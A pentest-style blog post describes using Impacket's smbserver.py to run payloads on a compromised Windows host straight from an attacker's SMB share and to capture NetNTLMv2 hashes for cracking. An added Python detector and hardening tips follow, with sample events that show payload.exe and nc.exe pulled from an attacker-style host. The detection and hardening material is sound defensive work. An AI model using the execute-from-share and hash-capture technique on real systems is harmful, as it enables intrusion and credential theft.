This is actually my favorite method to transfer a file to a Windows host. SMB is built into Windows and doesn’t require any special commands: you can simply use the standard copy and move commands and SMB handles the file transfer for you. What’s even better is that Windows will let you execute files directly via network (UNC) paths, meaning you can download and execute a payload in one command!
Enter smbserver.py, part of the Impacket project. To launch a simple SMB server on port 445, just specify a share name and the path you want to share. The Python script takes care of all the configuration for you, binds to port 445, and accepts any authentication. It will even print out the hashed challenge responses for any system that connects to it.
Proof of concept
After getting onto the victim’s machine with low privileges (e.g. via a reverse shell), we may see the warning message “This program cannot be run in DOS mode”. That means this system’s OS cannot run a program or payload greater than 16-bit. If the program is not allowed to run on that OS, we can run it through our smbserver.
Copy the files you want to use into the directory that is being shared.
Executing files from SMB. Because of the way Windows handles UNC paths, it is possible to execute our binary directly from the SMB share without even needing to copy it over first. Just run the executable as if it were already local and the payload will fire:
\\[ip]\share\[your file in share folder]
If you look at the output from smbserver.py, you can see that every time we access the share it prints the NetNTLMv2 hash for the current Windows user. You can feed these into John or Hashcat and crack them if you want (assuming you can’t just elevate to SYSTEM and get them from Mimikatz).
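As an added example (not code from the post or from the Impacket project), here is a small Python detector a defender could run over process-creation telemetry to catch both behaviours described above: a binary executed straight off a share (the image path itself is a UNC path, so the payload never touched local disk) and a copy from a share on a host that is not a known file server (the client that maps that share is the one whose NetNTLMv2 response ends up in the attacker’s smbserver.py output). The log lines, the allow-listed 10.0.0.0/16 range, the file-server names and the 192.168.49.1 address are all constructed for the example.

```python
"""Detect execution straight off an SMB share (Windows runs UNC paths like
local files) and references to shares on unexpected hosts.

Added example, not code from the original post or from Impacket: the log
lines are constructed to resemble Sysmon Event ID 1 / Security 4688 fields
as a SIEM might export them, and the allow-lists are hypothetical.
"""
import ipaddress
import re

# Hypothetical: where legitimate file servers live. A workstation executing
# from a share on any other host deserves a look.
ALLOWED_SHARE_NETWORKS = [ipaddress.ip_network("10.0.0.0/16")]
ALLOWED_SHARE_HOSTS = {"fileserver01", "fileserver01.corp.example"}

# \\host\share[\path] ; host and share stop at the next backslash or space.
UNC_RE = re.compile(r"\\\\([^\\\s]+)\\([^\\\s]+)(\\\S*)?")

# Constructed sample events (key=value pairs). Event 1 is the pattern the
# post describes: the image itself lives on a share on an unknown host.
SAMPLE_EVENTS = [
    r"EventID=1 Image=C:\Windows\System32\notepad.exe CommandLine=notepad.exe",
    r"EventID=1 Image=\\192.168.49.1\share\payload.exe CommandLine=\\192.168.49.1\share\payload.exe",
    r"EventID=1 Image=\\10.0.5.20\apps\setup.exe CommandLine=\\10.0.5.20\apps\setup.exe",
    r"EventID=1 Image=C:\Windows\System32\cmd.exe CommandLine=cmd.exe /c copy \\192.168.49.1\share\nc.exe C:\Users\Public\nc.exe",
]


def parse_event(line):
    """Split 'Key=value Key2=value with spaces' into a dict."""
    fields = {}
    for chunk in re.split(r"\s+(?=\w+=)", line.strip()):
        key, _, value = chunk.partition("=")
        fields[key] = value
    return fields


def find_unc_paths(text):
    """Return (host, share, path) for every \\host\share reference in text."""
    return [(m.group(1), m.group(2), m.group(3) or "") for m in UNC_RE.finditer(text)]


def host_is_allowed(host):
    """True if the share host is a known file server by name or by address."""
    if host.lower() in ALLOWED_SHARE_HOSTS:
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False  # unknown hostname: treat as not allowed
    return any(addr in net for net in ALLOWED_SHARE_NETWORKS)


def analyze(lines):
    """One finding per UNC reference; execution off an unknown host rates highest."""
    findings = []
    for index, line in enumerate(lines):
        event = parse_event(line)
        if event.get("EventID") != "1":
            continue
        seen = set()
        # The image path itself is on a share: the binary never touched disk.
        for host, share, path in find_unc_paths(event.get("Image", "")):
            allowed = host_is_allowed(host)
            findings.append({"event": index, "kind": "exec_from_share", "host": host,
                             "share": share, "path": path, "allowed": allowed,
                             "severity": "medium" if allowed else "high"})
            seen.add((host, share, path))
        # Other UNC references on the command line (copy, rundll32, etc.).
        for host, share, path in find_unc_paths(event.get("CommandLine", "")):
            if (host, share, path) in seen:
                continue
            allowed = host_is_allowed(host)
            findings.append({"event": index, "kind": "unc_reference", "host": host,
                             "share": share, "path": path, "allowed": allowed,
                             "severity": "info" if allowed else "medium"})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f['severity']}] event {f['event']}: {f['kind']} "
              f"host={f['host']} share={f['share']} allowed={f['allowed']}")
```

Run against the constructed events it flags the execution from `\\192.168.49.1\share\payload.exe` as high, the execution from the allow-listed `10.0.5.20` as medium (still worth a review, since the post shows how little an attacker needs) and the `copy` from the unknown host as medium. On the prevention side, blocking outbound TCP 445 at the egress firewall, and restricting outgoing NTLM to remote servers via Group Policy, removes both the execute-from-share path and the NetNTLMv2 exposure the post describes.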